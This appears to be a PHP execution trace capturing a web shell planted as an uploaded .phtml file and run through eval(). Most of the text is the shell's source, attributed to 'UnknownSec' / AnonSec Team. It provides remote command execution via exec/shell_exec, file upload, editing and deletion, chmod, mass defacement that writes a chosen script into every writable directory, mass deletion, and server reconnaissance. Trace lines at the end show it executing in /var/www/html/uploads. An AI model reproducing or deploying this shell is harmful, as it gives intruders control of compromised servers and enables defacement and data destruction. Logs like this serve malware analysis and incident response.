color=\'red\'>".$p."</font>";\r\n\t}\r\n}\r\n\r\nfunction ip() {\r\n\t$ipas = \'\';\r\nif (getenv(\'HTTP_CLIENT_IP\'))\r\n\t$ipas = getenv(\'HTTP_CLIENT_IP\');\r\nelse if(getenv(\'HTTP_X_FORWARDED_FOR\'))\r\n\t$ipas = getenv(\'HTTP_X_FORWARDED_FOR\');\r\nelse if(getenv(\'HTTP_X_FORWARDED\'))\r\n\t$ipas = getenv(\'HTTP_X_FORWARDED\');\r\nelse if(getenv(\'HTTP_FORWARDED_FOR\'))\r\n\t$ipas = getenv(\'HTTP_FORWARDED_FOR\');\r\nelse if(getenv(\'HTTP_FORWARDED\'))\r\n\t$ipas = getenv(\'HTTP_FORWARDED\');\r\nelse if(getenv(\'REMOTE_ADDR\'))\r\n\t$ipas = getenv(\'REMOTE_ADDR\');\r\nelse\r\n\t$ipas = \'IP tidak dikenali\';\r\nreturn $ipas;\r\n}\r\n\r\nfunction ekse() { \r\n\t$cmd = "whoami";\r\n\t$return = "";\r\n\t$output = "";\r\n\t$methodArray = array();\r\n\t//exec()\r\n\t$return = ""; $output = "";\r\n\texec($cmd, $output, $return);\r\n\tif (strlen($output[0]) > 0 && $return == 0) {\r\n\t\t$methodArray[] = "exec";\r\n\t}\r\n\t//shell_exec()\r\n\t$return = ""; $output = "";\r\n\t$output = shell_exec($cmd);\r\n\tif (strlen($output) > 0) {\r\n\t\t$methodArray[] = "shell_exec";\r\n\t}\r\n\treturn $methodArray;\r\n}\r\nfunction ekseCMD($cmd, $method) {\r\n\tif ($method == "") {\r\n\t\tob_start();\r\n\t\t$methodArray = ekse();\r\n\t\tob_end_clean();\r\n\t\tif (is_array($methodArray)) {\r\n\t\t\t$method = $methodArray[0];\r\n\t\t}\r\n\t}\r\n\tswitch ($method) {\r\n\t\tcase "exec":\r\n\t\t\texec($cmd, $output);\r\n\t\t\tvar_dump($output);\r\n\t\t\tbreak;\r\n\t\tcase "shell_exec":\r\n\t\t\techo shell_exec($cmd);\r\n\t\t\tbreak;\r\n\t}\r\n}\r\n$cmd = htmlspecialchars($_POST["cmd"]);\r\n$method = htmlspecialchars($_POST["execCMD"]);\r\n\t\r\nfunction p($file){\r\n$p = fileperms($file);\r\nif (($p & 0xC000) == 0xC000) {\r\n$i = \'s\';\r\n} elseif (($p & 0xA000) == 0xA000) {\r\n$i = \'l\';\r\n} elseif (($p & 0x8000) == 0x8000) {\r\n$i = \'-\';\r\n} elseif (($p & 0x6000) == 0x6000) {\r\n$i = \'b\';\r\n} elseif (($p & 0x4000) == 0x4000) {\r\n$i = \'d\';\r\n} elseif (($p & 0x2000) == 0x2000) {\r\n$i = \'c\';\r\n} elseif (($p & 0x1000) == 0x1000) {\r\n$i = \'p\';\r\n} else {\r\n$i = \'u\';\r\n\t}\r\n$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n$i .= (($p & 0x0040) ?\r\n(($p & 0x0800) ? \'s\' : \'x\' ) :\r\n(($p & 0x0800) ? \'S\' : \'-\'));\r\n$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n$i .= (($p & 0x0008) ?\r\n(($p & 0x0400) ? \'s\' : \'x\' ) :\r\n(($p & 0x0400) ? \'S\' : \'-\'));\r\n$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n$i .= (($p & 0x0001) ?\r\n(($p & 0x0200) ? \'t\' : \'x\' ) :\r\n(($p & 0x0200) ? \'T\' : \'-\'));\r\nreturn $i;\r\nexit();\r\n\t}\r\necho "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name=\'author\' content=\'$▛\'>\r\n\t\t<meta name=\'robots\' content=\'NOINDEX, NOFOLLOW\'>\r\n\t\t<title>".$_SERVER[\'HTTP_HOST\']." - $▛ 403</title>\r\n\t\t<meta name=\'viewport\' content=\'width=device-width, initial-scale=0.70, user-scalable=no\'>\r\n\t\t<link rel=\'stylesheet\' href=\'//unknownsec.ftp.sh/main/style.css\'>\r\n\t\t<script src=\'//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\'></script>\r\n\t\t<script src=\'//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js\'></script>\r\n\t</head>\r\n<body class=\'bg-secondary text-light\'>\r\n<div class=\'container-fluid\'>\r\n\t<div class=\'py-3\' id=\'main\'>\r\n\t\t<div class=\'box shadow bg-dark p-4 rounded-3\'>\r\n\t\t<a class=\'text-decoration-none text-light\' href=\'".$_SERVER[\'PHP_SELF\']."\'><h4>$▛ Bypass <i class=\'bi bi-bug-fill\'></i> 403</h4></a>";\r\n\t\tif(isset($_GET[\'path\'])){\r\n\t\t\t$path = $_GET[\'path\'];\r\n\t\t}else{\r\n\t\t\t$path = getcwd();\r\n\t}\r\n\t\t\t$path = str_replace(\'\\\\\',\'/\',$path);\r\n\t\t\t$paths = explode(\'/\',$path);\r\n\t\tforeach($paths as $id=>$pat){\r\n\t\tif($pat == \'\' && $id == 0){\r\n\t\t\t$a = true;\r\n\t\t\techo \'<i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>\';\r\n\t\tcontinue;\r\n\t}\r\n\t\tif($pat == \'\') continue;\r\n\t\t\techo \'<a class="text-decoration-none" href="?path=\';\r\n\t\tfor($i=0;$i<=$id;$i++){\r\n\t\t\techo "$paths[$i]";\r\n\t\tif($i != $id) echo "/";\r\n\t}\r\n\t\techo \'">\'.$pat.\'</a>/\';\r\n\t}\r\n\t\techo " [ ".▟($path, p($path))." ]";\r\necho "\r\n<div class=\'dropdown\'>\r\n\t<button class=\'btn btn-outline-light dropdown-toggle btn-sm\' type=\'button\' id=\'dropdownMenuButton\' data-toggle=\'dropdown\' aria-haspopup=\'true\' aria-expanded=\'false\'><i class=\'bi bi-menu-down\'></i> Menu</button>\r\n\t<div class=\'dropdown-menu\'>\r\n\t\t<a class=\'dropdown-item\' href=\'?path=$path&dir=$path&id=upload\'><i class=\'bi bi-upload\'></i> Upload</a>\r\n\t\t<a class=\'dropdown-item\' href=\'?path=$path&dir=$path&id=depes\'><i class=\'bi bi-exclamation-diamond\'></i> Mass depes</a>\r\n\t\t<a class=\'dropdown-item\' href=\'?path=$path&dir=$path&id=delete\'><i class=\'bi bi-trash\'></i> Mass delete</a>\r\n\t\t<a class=\'dropdown-item\' href=\'?path=$path&dir=$path&id=cmd\'><i class=\'bi bi-terminal\'></i> Terminal</a>\r\n\t\t<a class=\'dropdown-item\' href=\'?path=$path&dir=$path&id=info\'><i class=\'bi bi-info-circle\'></i> Info server</a>\r\n\t\t<a class=\'dropdown-item\' href=\'?path=$path&dir=$path&id=about\'><i class=\'bi bi-info\'></i> About</a></h5>\r\n\t</div>\r\n</div>";\r\n// tools nya\r\nif(isset($_GET[\'dir\'])) {\r\n\t$dir = $_GET[\'dir\'];\r\n\tchdir($dir);\r\n} else {\r\n\t$dir = getcwd();\r\n}\r\n$dir = str_replace("\\\\","/",$dir);\r\n$scdir = explode("/", $dir);\t\r\n\tfor($i = 0; $i <= $c_dir; $i++) {\r\n\t\t$scdir[$i];\r\n\t\tif($i != $c_dir) {\r\n\t\t}\r\nelseif($_GET[\'id\'] == \'depes\'){\r\n\tfunction mass_kabeh($dir,$namafile,$isi_script) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\techo "[<font color=green>success</font>] $▚<br>";\r\n\t\t\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t\t\t\t$▟ = mass_kabeh($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction mass_biasa($dir,$namafile,$isi_script) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\techo "[<font color=green>success</font>] $dirb/$namafile<br>";\r\n\t\t\t\t\t\tfile_put_contents($▚, $isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif($_POST[\'start\']) {\r\n\tif($_POST[\'tipe\'] == \'massal\') {\r\n\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\tmass_kabeh($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\techo "</div>";\r\n\t} elseif($_POST[\'tipe\'] == \'biasa\') {\r\n\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\tmass_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\techo "</div>";\r\n\t}\r\n} else {\r\necho "<br />$▘\r\n<form method=\'post\'>\r\n\t<b>Tipe:</b><br>\r\n<div class=\'custom-control custom-switch\'>\r\n\t<input type=\'checkbox\' id=\'customSwitch\' class=\'custom-control-input\' name=\'tipe\' value=\'biasa\'>\r\n\t<label class=\'custom-control-label\' for=\'customSwitch\'>Biasa</label>\r\n</div>\r\n<div class=\'custom-control custom-switch\'>\r\n\t<input type=\'checkbox\' id=\'customSwitch1\' class=\'custom-control-input\' name=\'tipe\' value=\'massal\'>\r\n\t<label class=\'custom-control-label\' for=\'customSwitch1\'>Massal</label>\r\n</div>\r\n\t<b><i class=\'bi bi-folder\'></i> Lokasi:</b>\r\n\t<input class=\'form-control\' type=\'text\' name=\'d_dir\' value=\'$dir\' height=\'10\'>\r\n\t<b><i class=\'bi bi-file-earmark\'></i> File name:</b>\r\n\t<input class=\'form-control\' type=\'text\' name=\'d_file\' placeholder=\'name file\' height=\'10\'>\r\n\t<b><i class=\'bi bi-file-earmark\'></i> Your script:</b>\r\n\t<textarea class=\'form-control\' rows=\'7\' name=\'script\' placeholder=\'your secript here\'></textarea><br />\r\n\t<input type=\'submit\' name=\'start\' value=\'Go\' class=\'btn btn-outline-light\'>\r\n</form>";\r\n\t}\r\n}\r\nelseif($_GET[\'id\'] == \'info\'){\r\n$disfunc = @ini_get("disable_functions");\r\nif (empty($disfunc)) {\r\n\t$disfc = "<font color=green>NONE</font>";\r\n} else {\r\n\t$disfc = "<font color=red>$disfunc</font>";\r\n}\r\nif(!function_exists(\'posix_getegid\')) {\r\n\t$user = @get_current_user();\r\n\t$uid = @getmyuid();\r\n\t$gid = @getmygid();\r\n\t$group = "?";\r\n} else {\r\n\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t$gid = @posix_getgrgid(posix_getegid());\r\n\t$user = $uid[\'name\'];\r\n\t$uid = $uid[\'uid\'];\r\n\t$group = $gid[\'name\'];\r\n\t$gid = $gid[\'gid\'];\r\n}\r\n$sm = (@ini_get(strtolower("safe_mode")) == \'on\') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";\r\necho \'<br />\'.$▘.\'\r\n<div class="container">\r\n\t<div class="card text-dark">\r\n\t\t<div class="card-header">\';\r\necho "<b>Uname: </b><font color=green>".php_uname()."</font><br />";\r\necho "<b>Software: </b><font color=green>".$_SERVER[\'SERVER_SOFTWARE\']."</font><br />";\r\necho "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";\r\necho "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER[\'HTTP_HOST\'])."</font><br />";\r\necho "<b>Your Ip: </b><font color=green>".ip()."</font><br />";\r\necho "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";\r\necho "<b>Safe Mode: </b>$sm<br />";\r\necho "<kbd>Disable Function:</kbd><pre>$disfc</pre>";\r\n\techo \'</div>\r\n\t</div>\r\n</div>\';\r\n}\r\nelseif($_GET[\'id\'] == \'about\'){\r\necho \'<br />\'.$▘.\'\r\n<div class="container">\r\n\t<div class="card text-dark">\r\n\t\t<div class="card-header">\';\r\necho "<img alt=\'AnonSec Team\' class=\'img-thumbnail rounded mx-auto d-block\' src=\'//unknownsec.ftp.sh/AnonSec.jpg\' width=\'150px\'>";\r\necho "<b>- About Me -</b><br />";\r\necho "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=\'\'>{ AnonSec Team } - And You</a><br />My email: <a href=\'mailto:unknownsec1337@gmail.com\'>unknownsec1337@gmail.com</a>";\r\n\techo \'</div>\r\n\t</div>\r\n</div>\';\r\n}\r\nelseif($_GET[\'id\'] == \'cmd\') {\r\necho "$▘<br>\r\n<form method=\'POST\'>\r\n<div class=\'input-group mb-3\'>\r\n\t<input class=\'form-control\' type=\'text\' name=\'cmd\' value=\'$cmd\'>\r\n\t<select class=\'bg-dark text-light form-control\' name=\'execCMD\'>\r\n\t\t<option>$method</option>";\r\nob_start();\r\n\t$methodArray = ekse();\r\n\tob_end_clean();\r\nforeach ($methodArray as $value) {\r\n\techo "<option>$value</option>";\r\n\t}\t\t\r\necho \'</select>\r\n\t</div>\r\n</form>\';\r\nif($cmd == "") {\r\necho "\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t\t<pre>";\r\n\t\tekseCMD("whoami", $method);\r\n\t\techo \'</pre>\r\n\t</div>\r\n</div>\';\r\n}else {\r\necho "\r\n<div class=\'card text-dark\'>\r\n\t<div class=\'card-header\'>\r\n\t\t<pre><kbd>~$ ".$cmd."</kbd><br>";\r\n\t\tekseCMD($cmd, $method);\r\n\t\techo "</pre>\r\n\t</div>\r\n</div>";\r\n}\r\n}\r\nelseif($_GET[\'id\'] == \'upload\'){\r\necho \'<br />\'.$▘.\'\r\n<form action="" method="post" enctype="multipart/form-data">\r\n\t<div class="input-group mb-3 text-center">\r\n\t\t<input type="file" class="form-control form-control-sm" name="file">\r\n\t\t<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>\r\n\t</div>\r\n</form>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Success",\r\n "Success upload",\r\n "success"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}else{\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Opsss",\r\n "Failed upload",\r\n "error"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}\r\n\t}\r\n}\r\nelseif($_GET[\'id\'] == \'delete\'){\r\nfunction hapus_massal($dir,$namafile) {\r\n\tif(is_writable($dir)) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t$▚ = $dirc.\'/\'.$namafile;\r\n\t\t\tif($dirb === \'.\') {\r\n\t\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t\t}\r\n\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\tif(file_exists($▚)) {\r\n\t\t\t\t\t\t\techo "[<font color=green>deleted</font>] $▚<br>";\r\n\t\t\t\t\t\t\tunlink($▚);\r\n\t\t\t\t\t\t\t$▟ = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif($_POST[\'start\']) {\r\necho "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\thapus_massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\necho "</div>";\r\n} else {\r\necho "<br />$▘\r\n<form method=\'post\'>\r\n\t<b><i class=\'bi bi-folder\'></i> Lokasi:</b>\r\n\t<input class=\'form-control\' type=\'text\' name=\'d_dir\' value=\'$dir\' height=\'10\'>\r\n\t<b><i class=\'bi bi-file-earmark\'></i> File name:</b>\r\n\t<div class=\'input-group mb-3\'>\r\n\t<input class=\'form-control\' type=\'text\' name=\'d_file\' placeholder=\'name file\' height=\'10\'><br>\r\n\t<div class=\'input-group-append\'>\r\n\t<input class=\'btn btn-outline-light\' type=\'submit\' name=\'start\' value=\'Go\'>\r\n</form>\r\n\t</div>\r\n\t</div>";\r\n\t\t}\r\n\t}\r\n}\r\n// akhir tools\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<br><b>name : </b>".basename($_GET[\'filesrc\']);"</br>";\r\necho \'<textarea class="form-control" rows="7" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea><br />\';\r\n}\r\nelseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'<br><b>name : </b>\'.basename($_POST[\'path\']);\'</br>\';\r\n//Chmod\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Success",\r\n "Success Change Permission",\r\n "success"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}else{\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Opsss",\r\n "Failed change permission",\r\n "error"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}\r\n}\r\necho \'<form method="POST">\r\n\t<div class="input-group mb-3">\r\n<input class="form-control" name="perm" type="text" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'"/>\r\n\t<input class="form-control" type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t<input class="form-control" type="hidden" name="opt" value="chmod">\r\n\t\t<div class="input-group-append">\r\n\t<input class="btn btn-outline-light" type="submit" value="Go"/>\r\n\t</form>\r\n\t</div>\r\n</div>\';\r\n}\r\n//rename folder\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\techo \'<form action="?option&path=\'.$cwd.\'&opt=delete&type=buat" method="POST">\r\n\t<div class="input-group mb-3">\r\n<input class="form-control" name="name" type="text" value="Folder"/>\r\n\t<input class="form-control" type="hidden" name="path" value="\'.$cwd.\'">\r\n\t\t<input class="form-control" type="hidden" name="opt" value="delete">\r\n\t\t<div class="input-group-append">\r\n\t<input class="btn btn-outline-light" type="submit" value="Go"/>\r\n\t</form>\r\n\t</div>\r\n</div>\';\r\n}\r\n//rename file\r\nelseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Success",\r\n "Success change name",\r\n "success"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}else{\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Opsss",\r\n "Failed change name",\r\n "error"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\n\t<div class="input-group mb-3">\r\n<input class="form-control" name="newname" type="text" value="\'.$_POST[\'name\'].\'" />\r\n\t<input class="form-control" type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t<input class="form-control" type="hidden" name="opt" value="rename">\r\n\t\t<div class="input-group-append">\r\n\t<input class="btn btn-outline-light" type="submit" value="Go"/>\r\n\t</form>\r\n\t</div>\r\n</div>\';\r\n}\r\n//edit file\r\nelseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Success",\r\n "Edit file Success",\r\n "success"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}else{\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Opsss",\r\n "Failed edit file",\r\n "error"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea class="form-control" rows="7" name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n\t<input class="form-control" type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n\t\t<input class="form-control" type="hidden" name="opt" value="edit">\r\n\t<input class="btn btn-outline-light" type="submit" value="Go"/>\r\n</form><br />\';\r\n\t}\r\n}else{\r\n//delete dir\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Success",\r\n "Success delete dir",\r\n "success"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}else{\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Opsss",\r\n "Failed delete dir",\r\n "error"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}\r\n}\r\n//delete file\r\nelseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Success",\r\n "Success delete file",\r\n "success"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}else{\r\necho \'\r\n<script type="text/javascript">\r\nSwal.fire(\r\n "Opsss",\r\n "Failed delete file",\r\n "error"\r\n).then((btnClick) => {if(btnClick){document.location.href="?path=\'.$path.\'"}})</script>\r\n\';\r\n}\r\n\t}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \'<div class="table-responsive">\r\n<table class="table table-hover table-dark text-light">\r\n<thead>\r\n<tr>\r\n\t<td class="text-center">Name</td>\r\n\t\t<td class="text-center">Last edit</td>\r\n\t\t<td class="text-center">Size</td>\r\n\t\t<td class="text-center">Permission</td>\r\n\t<td class="text-center">Options</td>\r\n</tr>\r\n</thead>\r\n<tbody class="text-nowrap">\';\r\nforeach($scandir as $dir){\r\n$dt = date("Y-m-d", filemtime("$path/$dir"));\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\n\techo "\r\n\t<tr>\r\n\t<td><i class=\'bi bi-folder-fill\'></i><a class=\'text-decoration-none text-secondary\' href=\\"?path=$path/$dir\\">$dir</a></td>\r\n\t<td><center>$dt</center></td>\r\n\t<td><center>DIR</center></td>\r\n\t<td><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\n\techo p("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\techo "</center></td>\r\n\t<td>\r\n<form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<div class=\'input-group mb-3 text-center\'>\r\n<select class=\\"form-select form-select-sm\\" name=\\"opt\\">\r\n\t<option selected disabled>Select</option>\r\n\t<option value=\\"delete\\">Delete</option>\r\n\t<option value=\\"chmod\\">Chmod</option>\r\n\t<option value=\\"rename\\">Rename</option>\r\n</select>\r\n\t<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\r\n\t<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\r\n\t\t<input class=\\"btn btn-outline-light btn-sm\\" type=\\"submit\\" value=\\"Go\\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";\r\n}\r\nforeach($scandir as $file){\r\n\t$ft = date("Y-m-d", filemtime("$path/$file"));\r\n\tif(!is_file($path.\'/\'.$file)) continue;\r\n\t$s = filesize($path.\'/\'.$file)/1024;\r\n\t$s = round($s,3);\r\n\tif($s >= 1024){\r\n\t\t$s = round($s/1024,2).\' MB\';\r\n\t}else{\r\n\t\t$s = $s.\' KB\';\r\n\t}\r\necho "\r\n\t<tr>\r\n\t<td><i class=\'bi bi-file-earmark-code-fill\'></i><a class=\'text-decoration-none text-secondary\' href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td>\r\n\t<td><center>$ft</center></td>\r\n\t<td><center>$s</center></td>\r\n\t<td><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\n\techo p("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\n\techo "</center></td>\r\n\t<td>\r\n<form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<div class=\'input-group mb-3 text-center\'>\r\n<select class=\\"form-select form-select-sm\\"name=\\"opt\\">\r\n\t<option selected disabled>Select</option>\r\n\t\t<option value=\\"delete\\">Delete</option>\r\n\t\t<option value=\\"edit\\">Edit</option>\r\n\t\t<option value=\\"rename\\">Rename</option>\r\n\t\t<option value=\\"chmod\\">Chmod</option>\r\n\t<option value=\\"download\\">Download</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\r\n\t<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\r\n\t\t<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\r\n\t\t<input class=\\"btn btn-outline-light btn-sm\\" type=\\"submit\\" value=\\"Go\\"/>\r\n\t</form>\r\n</div>\r\n</td>\r\n</tr>";\r\n\t}\r\n}\r\necho "\r\n</tbody>\r\n</table>\r\n<div class=\'text-center\'>\r\n\t<kbd>Copyright © ".date("Y")." - $▛</kbd>\r\n</div>\r\n\t</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<script src=\'//code.jquery.com/jquery-3.3.1.slim.min.js\'></script>\r\n<script src=\'//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js\'></script>\r\n<script src=\'//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js\'></script>\r\n</body>\r\n</html>";' /var/www/html/uploads/byp.phtml 9 0
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 1 $▛ = 'UnknownSec'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 2 $▘ = '<style>table{display:none;}</style>'
3 14 0 0.002018 557824 get_magic_quotes_gpc 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 11 0
3 14 1 0.002033 557824
3 14 R FALSE
3 15 0 0.002049 557824 htmlspecialchars 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 100 1 NULL
3 15 1 0.002065 558016
3 15 R ''
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 100 $cmd = ''
3 16 0 0.002090 557984 htmlspecialchars 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 101 1 NULL
3 16 1 0.002104 558176
3 16 R ''
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 101 $method = ''
3 17 0 0.002132 558144 getcwd 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 160 0
3 17 1 0.002147 558192
3 17 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 160 $path = '/var/www/html/uploads'
3 18 0 0.002174 558192 str_replace 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 162 3 '\\' '/' '/var/www/html/uploads'
3 18 1 0.002191 558288
3 18 R '/var/www/html/uploads'
2 A /var/www/html/uploads/byp.phtml(9) : eval()'d code 162 $path = '/var/www/html/uploads'
3 19 0 0.002217 558192 explode 0 /var/www/html/uploads/byp.phtml(9) : eval()'d code 163 2 '/' '/var/www/html/uploads'
3 19 1 0.002233 558768
3 19 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
